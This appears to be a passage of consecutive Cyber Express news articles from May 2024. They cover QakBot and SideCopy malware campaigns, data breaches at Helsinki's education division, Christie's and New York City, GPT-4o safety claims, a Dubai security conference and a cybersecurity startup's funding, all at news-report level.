QakBot, also known as Qbot, emerged as a banking trojan in 2008 and was used to steal credentials, website cookies, and credit cards to commit financial fraud. QakBot operators evolved over the years into initial access brokers, partnering with other threat groups to provide initial access to enterprise and home networks for ransomware attacks, espionage, and data theft. QakBot’s infrastructure was taken down in August 2023 following a multinational law enforcement operation spearheaded by the FBI and known as “Operation Duck Hunt.” But Microsoft identified the resurgence of QakBot in phishing campaigns targeting the hospitality industry in December. Law enforcement linked QakBot infections to 700,000 victim computers which included ransomware attacks targeting businesses, healthcare providers, and government agencies worldwide, which according to conservative estimates caused hundreds of millions of dollars in damage. Throughout the years, Qakbot served as an initial infection vector for various ransomware gangs and their affiliates, including Conti, ProLock, Egregor, REvil, RansomExx, MegaCortex, and most recently Black Basta.

Another Zero-Day Fix

Microsoft patched 59 CVEs in its May 2024 Patch Tuesday release, with one rated “critical,” 57 rated as “important” and one rated as “moderate.” The patch also contains a fix for another zero-day flaw other that the one exploited by QakBot. The other bug, tracked as CVE-2024-30040, is rated "important" on the CVSS scale and is a Windows MSHTML platform security feature bypass vulnerability. MSHTML is a proprietary browser engine for the Microsoft Windows version of Internet Explorer.

“This vulnerability bypasses OLE mitigations in Microsoft 365 and Microsoft Office which protect users from vulnerable COM/OLE controls,” Microsoft said.

A hacker who socially-engineers a victim into opening a malicious document would be able to execute arbitrary code by passing OLE mitigations in the Microsoft suite of office applications. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

Cyble Research and Intelligence Labs (CRIL) researchers have uncovered a new SideCopy campaign. The threat actor group has previously been observed targeting South Asian nations with a particular focus on government and military targets in India and Afghanistan. Active since May 2023, the campaign targets university students through sophisticated infection chains involving malicious LNK files, HTAs, and loader DLLs disguised as legitimate documents. Ultimately, the campaign deploys malware payloads such as Reverse RAT and Action RAT, granting attackers extensive control over infected devices. The research explores the tactics employed by SideCopy, such as their recent focus on university students, and potential overlap in activities with the Transparent Tribe APT group.

Technical Analysis of the SideCopy Campaign Infection Chain

In early May, CRIL identified a malicious domain employed by the SideCopy group in their operations. The website was discovered hosting a ZIP archive file named "files.zip" that contained sub-directories labeled as "economy," "it," and "survey." The survey directory included files similar to those previously employed by SideCopy in their earlier campaigns. [caption id="attachment_68383" align="alignnone" width="1228"] Source: Cyble[/caption] The campaign likely employs spam emails to distribute the malicious ZIP archive hosted through the compromised website as the initial infection vector. These archives contain malicious LNK files disguised as legitimate documents, such as "IT Trends.docx.lnk." Upon execution, the LNK files trigger a series of commands that proceeds to download and execute a malicious HTA file. The downloaded HTA files contain embedded payloads within additional lure documents and DLL files. The lure documents are typically themed around current affairs or relevant academic topics to appear legitimate to the targeted demographic. [caption id="attachment_68384" align="alignnone" width="604"] Source: Cyble Blog[/caption] [caption id="attachment_68385" align="alignnone" width="894"] Source: Cyble Blog[/caption] The malware is crafted with the functionality to adopt to the presence of different antivirus software such as Avast, Kaspersky and Bitdefender, which further amplifies its ability to evade detection and ensure persistence by placing the LNK shortcut files in the startup folder. The attack process ultimately leads to the deployment of malicious payloads such as Reverse RAT and Action RAT on to the victim system, which then connect to a remote Command-and-Control (C&C) server to commence malicious activities.

Intersection with Transparent Tribe Activities

The research further suggests a potential overlap or collaboration between SideCopy and Transparent Tribe, another APT group known for targeting Indian military and academic institutions. This intersection hints at a possible collaborative efforts or shared objectives between the two groups with researchers previously noting that SideCopy may function as a sub-division of Transparent Tribe. SideCopy is also known to emulate tactics of the Sidewinder APT group in the distribute of malware files, such as the use of disguised LNK files to initiate a complex chain of infections. CRIL researchers have advised the use of strong email filtering systems, exercise of caution, the deployment of network-level monitoring and the disabling of scripting languages such as PowerShell, MSHTA, cmd.exe to prevent against this potential threat. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

The field of Artificial Intelligence is rapidly evolving, and OpenAI's ChatGPT is a leader in this revolution. This groundbreaking large language model (LLM) redefined the expectations for AI. Just 18 months after its initial launch, OpenAI has released a major update: GPT-4o. This update widens the gap between OpenAI and its competitors, especially the likes of Google. OpenAI unveiled GPT-4o, with the "o" signifying "omni," during a live stream earlier this week. This latest iteration boasts significant advancements across various aspects. Here's a breakdown of the key features and capabilities of OpenAI's GPT-4o.

Features of GPT-4o

Enhanced Speed and Multimodality: GPT-4o operates at a faster pace than its predecessors and excels at understanding and processing diverse information formats – written text, audio, and visuals. This versatility allows GPT-4o to engage in more comprehensive and natural interactions. Free Tier Expansion: OpenAI is making AI more accessible by offering some GPT-4o features to free-tier users. This includes the ability to access web-based information during conversations, discuss images, upload files, and even utilize enterprise-grade data analysis tools (with limitations). Paid users will continue to enjoy a wider range of functionalities. Improved User Experience: The blog post accompanying the announcement showcases some impressive capabilities. GPT-4o can now generate convincingly realistic laughter, potentially pushing the boundaries of the uncanny valley and increasing user adoption. Additionally, it excels at interpreting visual input, allowing it to recognize sports on television and explain the rules – a valuable feature for many users. However, despite the new features and capabilities, the potential misuse of ChatGPT is still on the rise. The new version, though deemed safer than the previous versions, is still vulnerable to exploitation and can be leveraged by hackers and ransomware groups for nefarious purposes. Talking about the security concerns regarding the new version, OpenAI shared a detailed post about the new and advanced security measures being implemented in GPT-4o.

Security Concerns Surround ChatGPT 4o

The implications of ChatGPT for cybersecurity have been a hot topic of discussion among security leaders and experts as many worry that the AI software can easily be misused. Since its inception in November 2022, several organizations such as Amazon, JPMorgan Chase & Co., Bank of America, Citigroup, Deutsche Bank, Goldman Sachs, Wells Fargo and Verizon have restricted access or blocked the use of the program citing security concerns. In April 2023, Italy became the first country in the world to ban ChatGPT after accusing OpenAI of stealing user data. These concerns are not unfounded.

OpenAI Assures Safety

OpenAI reassured people that GPT-4o has "new safety systems to provide guardrails on voice outputs," plus extensive post-training and filtering of the training data to prevent ChatGPT from saying anything inappropriate or unsafe. GPT-4o was built in accordance with OpenAI's internal Preparedness Framework and voluntary commitments. More than 70 external security researchers red teamed GPT-4o before its release. In an article published on its official website, OpenAI states that its evaluations of cybersecurity do not score above “medium risk.” “GPT-4o has safety built-in by design across modalities, through techniques such as filtering training data and refining the model’s behavior through post-training. We have also created new safety systems to provide guardrails on voice outputs. Our evaluations of cybersecurity, CBRN, persuasion, and model autonomy show that GPT-4o does not score above Medium risk in any of these categories,” the post said. “This assessment involved running a suite of automated and human evaluations throughout the model training process. We tested both pre-safety-mitigation and post-safety-mitigation versions of the model, using custom fine-tuning and prompts, to better elicit model capabilities,” it added. OpenAI shared that it also employed the services of over 70 experts to identify risks and amplify safety. “GPT-4o has also undergone extensive external red teaming with 70+ external experts in domains such as social psychology, bias and fairness, and misinformation to identify risks that are introduced or amplified by the newly added modalities. We used these learnings to build out our safety interventions in order to improve the safety of interacting with GPT-4o. We will continue to mitigate new risks as they’re discovered,” it said. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

Hackers exploited an unpatched remote access server vulnerability in the Helsinki education division data breach to scour through records of 80,000 students, their guardians, and all of administrative personnel. The City of Helsinki detected the data breach on April 30, promptly initiating an investigation that found the hacker had gained access to student and personnel usernames and email addresses. Hannu Heikkinen, the chief digital officer of the City of Helsinki, in a Monday press conference said, “Further investigation has shown that the perpetrator has gained access to the usernames and email addresses of all city personnel, as well as the personal IDs and addresses of students, guardians and personnel from the Education Division.”

“Additionally, the perpetrator has also gained access to content on network drives belonging to the Education Division,” Heikkinen said.

“This is a very serious data breach, with possible, unfortunate consequences for our customers and personnel,” said City Manager Jukka-Pekka Ujula. “We regret this situation deeply.”

Helsinki Education Division Data Breach Linked to Remote Access Bug

The preliminary investigation found out that the Helsinki Education Division data breach was possible due to a vulnerability in a remote access server.

“The server had a vulnerability which the culprit was able to exploit to connect to the Education Division network.”

The city authorities did not reveal the name of the remote access server but said a hotfix patch was available at the time of exploitation, but why it was not installed on the server is currently unknown.

“Our security update and device maintenance controls and procedures have been insufficient,” said Heikkinen.

The breach targeted an extensive group, with most of the network drive data – comprising of tens of millions of files - containing non-identifying information or ordinary personal data, minimizing potential abuse, according to the city authorities. However, some files include confidential or sensitive personal data such as fees for early childhood education customers, children's status information like information requests by student welfare or information about the need of special support and medical certificates regarding the suspension of studies for upper secondary students, and sick leave records of Education Division personnel. The data breach also includes historical customer and personnel data. Meaning, even if an individual is not currently a customer or a member of staff at the Education Division, the hacker may still have accessed their data.

“Considering the number of users in the city’s services now and in previous years, in the worst case, this data breach affects over 80,000 students and their guardians,” Ujula said.

Satu Järvenkallas, executive director of the Education Division, said the authorities are currently unable to provide an accurate assessment of what data the hacker may have accessed as “the volume of data under investigation is significant.”

VPN Gateways, Network Edge Devices Need ‘Special Attention’

The City officials immediately notified the Data Protection Ombudsman, the Finnish Police, and Traficom’s National Cyber Security Centre after the discovery of the data breach at the Helsinki’s Education Division. Traficom’s cybersecurity center acknowledged the notification and said it was supporting the City of Helsinki in investigating the case. “The data breach that targeted the City of Helsinki is exceptionally large for its size in the municipal sector. The case affects many Finns and causes great concern,” it said on platform X (formerly known as Twitter). Critical vulnerabilities in network edge devices like this pose a risk to organizations' cybersecurity, said Traficom’s NCSC. Exploiting the vulnerabilities of VPN products intended for establishing secure remote connections, it is also possible for parties outside the organization to gain access to the internal networks, “especially if other measures to limit the attack are not in use,” it added.

“Severe and easy-to-exploit vulnerabilities have been detected in the network edge devices of many major device manufacturers, such as VPN gateways, in the past six months,” said Samuli Bergström, the director of the cybersecurity center. “That is why it is important that special attention is paid to resources and expertise in organizations.”

A very recent example of one such VPN appliance abuse is the zero-day exploitation in Ivanti VPN products, Ivanti Connect Secure (formerly Pulse Secure) and Ivanti Policy Secure gateways. Chinese state-backed hackers used two zero-day vulnerabilities in these products: an authentication bypass (CVE-2023-46805) and a command injection (CVE-2024-21887) bug to compromise several organizations including MITRE. “Reaction to the data breach has been quick and all the necessary resources are being and will be used on protective measures. This is the highest priority for the city’s senior management,” Ujula said. “After the breach, we have taken measures to ensure that a similar breach is no longer possible,” Heikkinen added.

“We have not discovered evidence that the perpetrator would have accessed the networks or data of other divisions. However, we are monitoring all City of Helsinki networks closely.”

Information for affected individuals is available via the Traficom’s Cybersecurity Centre website, data breach customer service, crisis emergency services and MIELI Mental Health Finland. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

This May, the heartbeat of the cybersecurity industry will resonate through Dubai, where The Cyber Express is set to host the much-anticipated third iteration of the World CyberCon META Edition 2024.   Scheduled for May 23, 2024, at Habtoor Palace Dubai, this premier event promises a comprehensive day filled with immersive experiences tailored to address the dynamic challenges and innovations in cybersecurity.  This year’s theme, "Securing Middle East’s Digital Future: Challenges and Solutions," lays the foundation for a unique gathering that is crucial for any professional navigating the cybersecurity landscape.   The World CyberCon META Edition will feature a stellar lineup of more than 40 prominent Chief Information Security Officers (CISOs) and other cybersecurity leaders who will share invaluable insights and strategies. Notable speakers include: 

• Sithembile (Nkosi) Songo, CISO, ESKOM  
• Dina Alsalamen, VP, Head of Cyber and Information Security Department, Bank ABC  
• Anoop Kumar, Head of Information Security Governance Risk & Compliance, Gulf News  
• Irene Corpuz, Cyber Policy Expert, Dubai Government Entity, Board Member, and Co-Founder, Women in Cyber Security Middle East (WiCSME)   
• Abhilash Radhadevi, Head of Cybersecurity, OQ Trading  
• Ahmed Nabil Mahmoud, Head of Cyber Defense and Security Operations, Abu Dhabi Islamic Bank 

The World CyberCon META Edition 2024

[caption id="attachment_68285" align="alignnone" width="1140"] Highlights from the 2023 World CyberCon in Mumbai.[/caption] A Comprehensive Platform for Learning & Innovation  The World CyberCon META Edition 2024 promises a rich agenda with topics ranging from the nuances of national cybersecurity strategies to the latest in threat intelligence and protection against advanced threats. Discussions will span a variety of crucial subjects including: 

• Securing a Digital UAE: National Cybersecurity Strategy 
• Predictive Cyber Threat Intelligence: Anticipating Tomorrow’s Attacks Today 
• Navigating the Cyber Threat Terrain: Unveiling Innovative Approaches to Cyber Risk Scoring 
• Fortifying Against Ransomware: Robust Strategies for Prevention, Mitigation, and Swift Recovery 
• Strategic Investments in Cybersecurity: Leveraging AI and ML for Enhanced Threat Detection 

Who Should Attend?  The World CyberCon META Edition 2024 is tailored for CISOs, CIOs, CTOs, security auditors, heads of IT, cybercrime specialists, and network engineers. It’s an invaluable opportunity for those invested in the future of internet safety to gain insights, establish connections, and explore new business avenues.  Engage and Network  In addition to knowledge sessions, the conference will feature interactive workshops, an engaging exhibition zone, and plenty of networking opportunities. This event is set to honor the significant contributions of cybersecurity professionals and provide them with the recognition they deserve.  Secure Your Place  Don’t miss this unique chance to connect with leading professionals and gain insights from the forefront of cybersecurity. Reserve your spot at World CyberCon META Edition 2024 by visiting (https://thecyberexpress.com/cyber-security-events/world-cybercon-3rd-edition-meta/).  More Information  For more details on the event sponsorship opportunities and delegate passes, please contact Ashish Jaiswal at ashish.j@thecyberexpress.com.  About The Cyber Express  Stay informed with TheCyberExpress.com, your essential source for cybersecurity news, insights, and resources, dedicated to empowering you with the knowledge needed to protect your digital assets.   Join us in shaping the digital future at World CyberCon META Edition 2024 in Dubai. Let’s secure tomorrow together! 

In the latest twist of the cyber warfare between Anonymous Egypt group and R00TK1T hackers, the latter has turned up the heat on Egyptian soil, accusing the Anonymous Egypt group of content theft. In a dark web post, R00TK1T has vowed to intensify cyberattacks on Egypt, targeting major infrastructure and organizations within the nation.  The retaliation was swift and severe — starting the attacks with cyber assaults on the Ministry of Supply and Internal Trade in Egypt and a prominent software company with operations in Egypt.  The hacker used the same methods to target all the alleged victims and left several messages on their data leak channel, condemning the Anonymous Egypt group, stating, “Anonymous Egypt made a grave mistake thinking they could outsmart us. Now, it's time to show them the true power of our skills. ”

R00TK1T's Cyberattacks on Egypt Post Anonymous Egypt Confrontation

[caption id="attachment_68271" align="alignnone" width="431"] Source: Dark Web[/caption] In a declaration on dark web, R00TK1T proclaimed, "Security Is Just An Illusion, Privacy Is Just Another Illusion." They warned of impending chaos, signaling their determination to disrupt the status quo. Their message resonated with defiance: "F*ck Society & The System! We Are R00TK1T Will Be Anywhere Anytime!" The Ministry of Supply and Internal Trade was among the first victims that allegedly fell prey to R00TK1T's infiltration, with the group proudly flaunting evidence of their access to the ministry's most secure networks.  [caption id="attachment_68095" align="alignnone" width="522"] Source: X[/caption] As images surfaced, showcasing the depth of their intrusion, it became clear that R00TK1T's retaliation was not against the hacker group but the whole of Egypt. 

R00TK1T Cyberattacks Intensifies 

[caption id="attachment_68274" align="alignnone" width="443"] Source: X[/caption] But these cyberattacks on Egyptian companies didn't end there. CorporateStack, a renowned company specializing in digital transformation solutions, also fell victim to an alleged cyberattack by the hacker group.  With clients like Bentley, Vodafone, and Hexa, CorporateStack was a prime target for R00TK1T's message: no entity was beyond their reach. The group's infiltration into CorporateStack's systems sent a clear message to businesses operating in Egypt.  This is an ongoing story and The Cyber Express will be closely monitoring the situation. We’ll update this post once we have more information on the alleged cyberattacks on Egypt by the hacker group or any official confirmation from the organizations listed by R00TK1T hackers.  Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

Recently, HPE Aruba Networking, formerly known as Aruba Networks, has encountered significant security challenges. Vulnerabilities in their ArubaOS, the proprietary network operating system, have been identified, posing serious risks, including remote code execution (RCE). In this article, we delve into the details of these HPE Aruba vulnerabilities, their implications, and the recommended actions to mitigate […]

The post HPE Aruba Vulnerabilities: Prevent Systems From RCE Attacks appeared first on TuxCare.

The post HPE Aruba Vulnerabilities: Prevent Systems From RCE Attacks appeared first on Security Boulevard.

Just days before its highly anticipated spring art auctions, Christie's, the renowned auction house, had fallen victim to a cyberattack, taking its website offline and raising concerns about the security of client data. The Christie's auction house cyberattack has sent shockwaves through the art world, with collectors, advisers, and dealers scrambling to adapt to the sudden disruption. Christie's is a British auction house founded in 1766 by James Christie, offering around 350 different auctions annually in over 80 categories, such as decorative and fine arts, jewelry, photographs, collectibles, and wine. The auction house has a global presence in 46 countries, with 10 salerooms worldwide, including London, New York, Paris, Geneva, Amsterdam, Hong Kong, and Shanghai. The company provided a temporary webpage after its official website was taken down and later notified that the auctions would proceed despite the setbacks caused by the cyberattack.

Christie’s Auction House Cyberattack Occurs Ahead of Major Auctions

[caption id="attachment_68140" align="alignnone" width="1000"] Source: Shutterstock[/caption] The cyberattack came at an inopportune time for Christie's, with several high-stakes auctions estimated at around $850 million in worth scheduled to take place in New York and Geneva. Art adviser Todd Levin highlighted the significance of the timing, expressing concern that the cyberattack was happening during a pivotal moment before the spring sales when buyers confirm their interest in artworks. He raised a pressing question: "How can potential bidders access the catalog?" The auctions will include works by Warhol, Basquiat, and Claude Monet, and pieces from the Rosa de la Cruz Collection, that are expected to generate hundreds of millions of dollars in revenue. Christie's website was taken offline following the hack which affected some of its systems. Despite the setback, Christie's has assured clients that the auctions will proceed as planned, with bidders able to participate in person, by phone, or through Christie's Live platform. Despite the hack, Christie's CEO Guillaume Cerutti assured clients that all eight live auctions in New York and Geneva would proceed as scheduled, with the exception of the Rare Watches sale, which was postponed to May 14th. In a statement, Cerutti elaborated: "I want to assure you that we are managing this incident according to our well-established protocols and practices, with the support of additional experts. This included, among other things, the proactive protection of our main website by taking it offline."

Growing Cybersecurity Concerns in the Art World

The incident is a sobering reminder of the increasing threat of cyberattacks in the art world. In recent years, several museums and art market platforms have fallen victim to hacking, highlighting the need for vigilance in protecting sensitive client information amidst slumbering sales. Earlier in January, a service provider managing the online collections of several prominent museums had been targeted, affecting institutions like The Museum of Fine Arts in Boston, the Rubin Museum of Art in New York, and the Crystal Bridges Museum of American Art. Last year in 2023, Christie's had another security incident come to light when it was discovered inadvertently exposing the GPS location and co-ordinates of several art pieces purchased by some of the world’s biggest and wealthiest collectors, revealing their exact whereabouts.  In 2017, hackers employed an email scam to intercept payments between dealers and clients, siphoning sums ranging from £10,000 to £1 million. These incidents underscore the art world's vulnerability to similar threats as the market becomes increasingly digital, auction houses and museums must take proactive steps to to invest in stronger defenses against a rapidly evolving cyber threat landscape and the risks it may pose to the art industry. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

An unidentified threat actor known as "pwns3c" has offered access to a database purported to contain sensitive data and documents from a City of New York data breach for sale on BreachForums. The City of New York website offers official digital representation of the city's government as well as access to related information such as alerts, 311 services, news, programs or events with the city. The claims made in the post, despite its alleged nature raises significant concerns about the extent of the data breach as well as the security practices followed by the government office.

Alleged City of New York Data Breach Claimed to Include Sensitive Data

The stolen database is allegedly stated to include 199 PDF files, approximately 70MB in size in total. The exposed data includes a wide range of personally identifiable information (PII), such as: Licensee Serial Number, Expiration Date, Applicant or Licensee Name, Trade Name, Street Address, City, Zip Code, Phone Number of Applicant, and Business Email of Applicant. Moreover, the data also reveals sensitive details about building owners, attorneys, and individuals, including their EIN, SSN, and signature. The threat actor is selling this sensitive information for a mere $30, and interested buyers are instructed to contact them through private messages within BreachForums or through their Telegram handle. The post seemingly includes links to download samples of the data allegedly stolen in the attack. [caption id="attachment_68084" align="alignnone" width="1872"] Source: BreachForums[/caption] The alleged data breach has far-reaching implications, as it puts the personal information of numerous individuals at risk. The leak of personally identifiable information (PII) and sensitive documents exposes individuals to potential risks of identity theft, fraud, and other malicious activities. The Cyber Express team has reached out to the New York City mayor's official press contact email for confirmation. However, no response has been received as of yet.

pwns3c Earlier Claimed to have Hacked Virginia Department of Elections

In an earlier post on BreachForums, pwns3c claimed an alleged data breach against the Virginia Department of Elections, compromising of at least 6,500 records. The earlier stolen data was also offered for USD 30 in Bitcoin (BTC), Litecoin (LTC), or Monero (XMR) on the dark web. The Virginia Department of Elections is responsible for providing and overseeing open and secure elections for the citizens of the Commonwealth of Virginia. It is responsible for voter registration, absentee voting, ballot access for candidates, campaign finance disclosure and voting equipment certification in coordination with about 133 of Virginia's local election offices. The compromised data was allegedly stated to have included sensitive information such as timestamps, usernames, election data, candidate information, and voting method details. However, there has been no official confirmation of the stated incident as of yet. The breaches claimed by pwns3c, despite their alleged nature highlight the persistent challenges of securing the websites of government institutions. The sensitive nature of the stolen data that may allegedly include Social Security Numbers (SSNs), contact information, election-related details, and signatures, underscores the urgency for government websites to strengthen their security measures. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

This week on TCE Cyberwatch we’re covering the different data breaches and vulnerabilities faced by different companies. Along with this, the rise of countries using AI and deepfake technology, some consensual and some not, adds depth to the conversation surrounding the security of it all. TCE Cyberwatch aims to bring updates around large-scale and small-scale events to ensure our readers stay updated and stay in the know of cybersecurity news that can impact them. Keep reading to learn about what’s currently trending in the industry.

Dropbox Sign data breached; Customers authentication information Stolen

Dropbox, a popular drive and file sharing service, revealed that they had recently faced a security breach which led to sensitive information being endangered. Specifically, Dropbox Sign, a service used to sign documents, was targeted. The data stolen was of Dropbox Sign users, which had information such as passwords, account settings, names, emails, and other authentication information. Rotation and generation of OAuth tokens and API keys are steps that have been taken by Dropbox to control fallout. Dropbox has assured that “from a technical perspective, Dropbox Sign’s infrastructure is largely separate from other Dropbox services. That said, we thoroughly investigated this risk and believe that this incident was isolated to Dropbox Sign infrastructure, and did not impact any other Dropbox products.” Read More

Cyberattacks on organizations in the UAE claimed by Five Families Alliance member, Stormous Ransomware

Stormous Ransomware has claimed responsibility for cyberattacks that have attacked several UAE entities. A ransomware group linked to the Five Families alliance which is known for targeting the UAE entities, Stormous Ransomware has targeted organisations like the Federal Authority for Nuclear Regulation (FANR); Kids.ae, the government’s digital platform for children; the Telecommunications and Digital Regulatory Authority (TDRA), and more. After announcing alleged responsibility for the attacks, the ransomware group demanded 150 BTCs, which comes to around $6.7 million USD. They had threatened to leak stolen data if the ransom was not paid. The organisations targeted by the group are yet to speak up about the situation and tensions are high due to the insurmountable damage these claims could cause. Read More

Russian bitcoin cybercriminal pleads guilty in the U.S. after arrest in France

Alexander Vinnik, a Russian cybercrime suspect, recently pleaded partially guilty to charges in the U.S. Previously arrested in Greece in 2017 on charges of money laundering of $4 billion through the digital currency bitcoin in France, Vinnik is now set to face a trial in California. Vinnik’s lawyer, Arkady Bukh, predicted that Vinnik could get a prison term of less than 10 years due to the plea bargain. The U.S. Department of Justice accused Vinnik of having "allegedly owned, operated, and administrated BTC-e, a significant cybercrime and online money laundering entity that allowed its users to trade in bitcoin with high levels of anonymity and developed a customer base heavily reliant on criminal activity." Read More

Many Android apps on Google Play store now have vulnerabilities that infiltrate them

Popular Android applications have faced a path traversal-affiliated vulnerability. Called the Dirty Stream attack, it can be exploited by one of these flagged applications leading to overwriting files. The Microsoft Threat Intelligence team stated that, “the implications of this vulnerability pattern include arbitrary code execution and token theft, depending on an application's implementation.” The apps who have faced this vulnerability are popular, with 500 million to 1 billion downloads. Exploitation would have led to the attacker having control of the app and being able to access the user’s data, like accounts used. Microsoft is worried about it being a bigger issue and has asked developers to focus on security to protect sensitive information. Read More

Department of Social Welfare, Ladakh, in India, allegedly hacked, but no proof provided

Recently, a threat actor had allegedly hacked the database of the Department of Social Welfare Ladakh, Government of India. Their claims, however, seemed to have no support. No information was disclosed from their side and no breaching of sorts was sensed on the department’s website. However, if the claims are true, the fallout is predicted to be very damaging. Investigations into the claims are currently happening. As no motive or even the authenticity has been confirmed, for the individuals whose data resides in the departments database and national security, it’s important to detect and respond in a swift manner as to preserve the nation’s cyber security. Read More

U.K. military data breach endangers information of current, veteran military personnel

The U.K. military faced a data breach where the information of serving UK military personnel was obtained. The attack was of Ministry of Defence’s payroll system and so information like names and bank details, sometimes addresses, were gathered. The hacker behind it was unknown until now but the Ministry has taken immediate action. The "personal HMRC-style information" of members in the Royal Navy, Army and Royal Air Force was targeted, some current and some past. The Ministry of Defence is currently providing support for the personnel whose information was exfiltrated, and this also requires informing veterans’ organisations. Defence Secretary Grant Shapps is expected to announce a "multi-point plan” when he updates the MPs on the attack. Read More

India’s current election sees deepfakes, Prime Minister Modi calls for arrests of political parties responsible

India’s current Prime Minister Modi has announced that fake videos of him and other leaders making “statements that we have never even thought of”, have been circulating. This election, with its new name of being India’s first AI election, has led to police investigations of opposition parties who have made these videos with Modi calling for arrests. Prior to this, investigations regarding fake videos of Bollywood actors criticising Modi were also taking place. However, in this situation, around nine people have been arrested - six of whom are members of Congress’ social media teams. Five of them have managed to be released on bail, but arrests of higher-ranking social media members have been made. There has been a trending tag #ReleaseArunReddy for Congress national social media co-ordinator, Arun Reddy, who had shared the fake videos.

Germany and Poland accuse Russian Military Service of cyber-attacks

Germany has come out stating that an attack on their Social Democratic Party last year was done by a threat group believed to be linked to Russian Military Services. German Foreign Minister Annalena Baerbock said at a news conference in Australia that APT28, a threat group also known as Fancy Bear, has been “unambiguously” confirmed to have been behind the cyberattack. Additionally, Poland has joined in support of Germany and said that they were targeted by ATP28 too. Poland has not revealed any details about the attack they faced but Germany shares that they are working to rebuild damage faced by it. Baerbock stated that, “it was a state-sponsored Russian cyber-attack on Germany, and this is absolutely intolerable and unacceptable and will have consequences.”

Ukraine unveils new AI-generated foreign ministry spokesperson

Ukraine has just revealed an AI spokesperson who has been generated to deliver official statements for the foreign ministry. The messages being delivered are written by humans, but the AI is set to deliver them, moving animatedly and presenting herself as an individual through introducing herself as Victoria Shi. Victoria is modelled based on a Ukrainian celebrity, Rosalie Nombre, who took part in her development and helped to model the AIs appearance and voice after her. Ukraine’s foreign minister has said that she was developed for “saving time and resources,” along with it being a “technological leap that no diplomatic service in the world has yet made.” Read More

Singapore passes new amendment to their cybersecurity bill which regulates temporary, high-risk attacks

A new amendment to Singapore’s Cybersecurity Law was made by its Parliament to keep up with the country’s evolving critical infrastructure and to adapt to technological advancements. The changes made regulate the Systems of Temporary Cybersecurity Concern (STCC), which encompass systems most vulnerable to attacks in a limited period. This means the Cyber Security Agency of Singapore (CSA) can oversee Entities of Special Cybersecurity Interest (ESCIs), due to their error disposition affecting the nation’s security as a whole. With the country’s defence, public health and safety, foreign relations, and economy in danger, the Bill is set to target critical national systems only, leaving businesses and such as they are. Read More

Eurovision becomes susceptible to cyberattacks as the world’s largest music competition takes place during conflict

The 68th Eurovision Song Contest is being held in Sweden, Malmö, this year due to current tensions surrounding conflicts like Israel and Gaza, and Russia and Ukraine. Security has been tightened as in 2019, hackers had infiltrated the online stream of the semi-finals in Israel by warning a missile strike and showed images of attacks in Tel Aviv, the host city. There are several reports about hackers hijacking the broadcast as over 167 million people tuned in to watch last year. The voting system can also be an issue with the finals coming up, but Malmö’s police chief claims to be more worried about disinformation. The spokesperson for the contest stated that “We are working closely with SVT's security team and the relevant authorities and expert partners to ensure we have the appropriate measures in place to protect from such risks.” Read More

Wrap Up

This week we’ve seen militaries and governments being cyber-attacked and that truly reminds us how interconnected everything is. If big organisations are vulnerable to attacks, then so are we. TCE Cyberwatch hopes that everyone stays vigilant in the current climate of increased cyberattack risks and ensure they stay protected and are on the lookout for any threats which could affect them. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

Treacle, a cybersecurity startup founded in 2021 by Subhasis Mukhopadhyay, Subhajit Manna, and Partha Das, has raised about 40 million in its pre-Series A funding round. This milestone achievement underscores the company's rapid growth and recognition within the industry. Founded by three seasoned entrepreneurs, Treacle has been deliberate in its mission to develop cutting-edge cybersecurity solutions that safeguard businesses from the ever-evolving threat landscape. With this latest injection of capital, the company plans to expand its product offerings, enhance its research and development capabilities, and further solidify its presence in the market. The pre-seed funding round, which marks a significant milestone for the startup, is expected to propel Treacle's growth trajectory. The company's founders express belief that this influx of capital will enable them to further accelerate goals. The funding was led by prominent investors who have shown a keen interest in Treacle's approach to tackling modern digital threats.

Treacle Offers Defensive Cyber Security Solutions

Treacle serves both private and government sectors with solutions developed through rigorous research. Subhasis Mukhopadhyay stated, “Our mission centers on safeguarding network infrastructures through early detection, containment, and deception of threats. We're committed to delivering unparalleled value in the market, ensuring our clients have access to premium security solutions affordably. Our goal is to establish ourselves as a market leader and create a safer cyber world within the next five to six years. The standout product of Treacle is the AI-Based Proactive Defense System with in-built Deception. This service is designed to protect businesses even if their firewalls and defense layers have been breached. It works by tracking and analyzing attacker behavior in the early stages, then luring the attacker into a complex, containerized mirage network. This strategy not only keeps other systems safe but also allows the gathering of important data about the threat, which is used to provide early warnings to SOC analysts, helping to prevent an attack before it takes place. Treacle also offers a range of other services, including Customized Honeypot Solutions, Network and Host-Based Intrusion Detection Systems, Insider Threat Detection Systems, and OT Network Security Systems. Additionally, the company can conduct thorough Cyber Security Audits and help design effective security policies. Vikram Ramasubramanian, Partner at Inflection Point Ventures, highlighted Treacle's core strengths in AI-Based Deception Technology, a cornerstone of their Defensive Cyber Security solutions. The company plans to introduce new features and enhancements that will further strengthen its security offerings and provide even greater value to its clients.

Company Growth and Achievements

